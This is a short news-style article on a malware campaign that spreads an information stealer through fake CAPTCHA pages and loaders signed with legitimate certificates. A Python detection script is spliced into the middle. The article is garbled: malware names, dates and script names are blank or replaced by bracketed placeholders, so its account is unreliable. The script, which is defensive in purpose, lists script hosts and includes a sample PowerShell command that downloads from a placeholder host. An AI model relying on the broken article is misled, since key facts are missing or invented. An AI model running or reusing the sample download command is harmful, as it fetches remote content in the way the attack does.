Hijacking Loaders: A New Malicious Activity Using Legitimate Certificates
Researchers from a French company have discovered a new malicious activity that uses legitimate digital signature certificates for distribution.
Infection Chain Overview
The malicious activity, aimed at installing the data-stealing program known as , also referred to as and , first came to light in . It spreads through fake downloads disguised as pirated software or movies. The newer version of the attack sends users to a fake CAPTCHA page that prompts them to paste and run commands, which download the infected archive.
Since mid-month this year, three variants of the malicious scripts have been observed, including scripts that use "." and "." to execute code and fetch malicious data from remote servers. The archive the victim downloads contains legitimate executable files alongside malicious loaders. The loaders decrypt and run an encrypted payload whose job is to download and launch the second-stage information stealer.
Since [month] [year], the attackers have been using signed binaries instead of [unspecified method] to evade antivirus detection. It is unclear whether all of the certificates were stolen; the researchers believe some may have been obtained by the attackers themselves. The certificates used to sign the malware have reportedly been revoked.
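A detection sketch for the two stages just described, the user-pasted download command and the signed loader with a revoked certificate. This is an added example, not code from the article or the researchers; the process events, hostnames and certificate thumbprints are constructed, and the script-host list and the desktop-shell parent (how a command run from the Windows Run dialog appears) are assumptions, since the article leaves the specific scripts unnamed.

```python
"""Flag fake-CAPTCHA style execution and revoked-certificate loaders.

Added example with constructed telemetry; not from the original article.
"""
import re

# Assumed list of interpreters a pasted one-liner would typically invoke.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "mshta.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def is_pasted_download(event):
    """A script host started directly by the desktop shell (assumed to be how a
    Run-dialog command appears) that references a remote URL."""
    return (event["parent"].lower() == "explorer.exe"
            and event["image"].lower() in SCRIPT_HOSTS
            and URL_RE.search(event["cmdline"]) is not None)


def is_revoked_signer(event, revoked):
    """Binary is signed, but the signing certificate is on the revoked set."""
    return event.get("signer_thumbprint") in revoked


def triage(events, revoked):
    """Return (image, [reasons]) for every event that matches a rule."""
    hits = []
    for ev in events:
        reasons = []
        if is_pasted_download(ev):
            reasons.append("user-pasted remote download")
        if is_revoked_signer(ev, revoked):
            reasons.append("revoked signing certificate")
        if reasons:
            hits.append((ev["image"], reasons))
    return hits


# Constructed sample telemetry; hostnames and thumbprints are placeholders.
EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -NoProfile -Command "Invoke-WebRequest http://example.invalid/verify"'},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe readme.txt"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -File backup.ps1 http://intranet.invalid/status"},
    {"parent": "explorer.exe", "image": "Setup.exe", "cmdline": "Setup.exe",
     "signer_thumbprint": "THUMBPRINT-PLACEHOLDER-1"},
]
REVOKED = {"THUMBPRINT-PLACEHOLDER-1"}  # constructed revocation set

if __name__ == "__main__":
    for image, reasons in triage(EVENTS, REVOKED):
        print(image, "->", "; ".join(reasons))
```

The third event is deliberately left unflagged: the same download command launched from a scripted parent is out of scope for this rule, which targets only commands a user typed in by hand.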
Recent reports also describe an increase in targeted attacks that deliver a specific trojan. This trojan spreads rapidly by creating multiple copies of itself and opens a backdoor for remote access.
The use of legitimate digital signatures to distribute malware shows that even established trust mechanisms can become effective tools in the hands of attackers. It underscores the need to keep improving defenses and to stay alert to suspicious activity, even activity that appears harmless.